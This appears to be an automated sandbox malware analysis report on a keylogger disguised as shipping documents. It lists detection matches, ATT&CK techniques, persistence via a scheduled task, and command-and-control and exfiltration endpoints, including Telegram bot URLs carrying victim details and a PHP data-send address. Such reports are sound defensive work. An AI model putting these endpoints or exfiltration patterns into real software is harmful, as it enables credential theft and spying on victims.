Source: Yara match	File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5520, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	311 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rShippingDocuments240384.exe	32%	ReversingLabs	Win32.Trojan.Generic
rShippingDocuments240384.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\tdcorV.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tdcorV.exe	32%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
mail.bulatpharmaceutical.com	166.62.28.124	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2021:03:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.72	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2029/10/2024%20/%2020:43:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	RegSvcs.exe, 0000000E.00000002.3920889252.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000032A4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://certs.starfieldtech.com/repository/0	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://certificates.starfieldtech.com/repository/0	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://certs.starfieldtech.com/repository/1402	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.starfieldtech.com/sfroot-g2.crl0L	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.72$	RegSvcs.exe, 00000009.00000002.3921187548.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000313A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://tempuri.org/DataSet1.xsd	rShippingDocuments240384.exe, tdcorV.exe.0.dr	false		unknown
https://www.office.com/lB	RegSvcs.exe, 00000009.00000002.3921187548.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000032AE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.starfieldtech.com/08	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.starfieldtech.com/0;	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	RegSvcs.exe, 0000000E.00000002.3920889252.0000000003282000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.starfieldtech.com/0F	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.starfieldtech.com/sfig2s1-677.crl0c	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a	RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	RegSvcs.exe, 00000009.00000002.3921187548.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000327D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000009.00000002.3921187548.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.bulatpharmaceutical.com	RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.starfieldtech.com/sfroot.crl0L	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://certificates.starfieldtech.com/repository/sfig2.crt0	RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rShippingDocuments240384.exe, 00000000.00000002.1486523776.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1527172861.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
166.62.28.124	mail.bulatpharmaceutical.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544369
Start date and time:	2024-10-29 10:31:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rShippingDocuments240384.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@4/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 220 Number of non-executed functions: 17
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 4684 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: rShippingDocuments240384.exe

Simulations

Behavior and APIs

Time	Type	Description
05:32:04	API Interceptor	2x Sleep call for process: rShippingDocuments240384.exe modified
05:32:06	API Interceptor	32x Sleep call for process: powershell.exe modified
05:32:10	API Interceptor	2x Sleep call for process: tdcorV.exe modified
05:32:10	API Interceptor	13911497x Sleep call for process: RegSvcs.exe modified
10:32:07	Task Scheduler	Run new task: tdcorV path: C:\Users\user\AppData\Roaming\tdcorV.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse
	Fedex.exe	Get hash	malicious	AgentTesla	Browse
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
166.62.28.124	Invoice#22179.js	Get hash	malicious	FormBook	Browse	www.roshansinghmalli.com/o5kv/?Qzr=8+ncLh7BhnXpTKm78o7FDQFpmVUCoWMOe6iczmO3WDExoUjaf3jX1lOrFrd3cbfQ4QHMwHykSqQQnfA4uoA/ARboHFan4RF+mVLqOHD3P02J&c2MHJ=V2Jlun_P
188.114.97.3	rPO_28102400.exe	Get hash	malicious	Lokibot	Browse	ghcopz.shop/ClarkB/PWS/fre.php
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
	PO 4800040256.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/4hfb/
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/cDXpxO66/download
	Instruction_1928.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	WBCDZ4Z3M2667YBDZ5K4.bin.exe	Get hash	malicious	Unknown	Browse	tech-tribune.shop/pLQvfD4d5/index.php
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	www.rs-ag.com/
	https://is.gd/6NgVrQ	Get hash	malicious	HTMLPhisher	Browse	aa.opencompanies.co.uk/vEXJm/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	M2AB8BeHc4.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
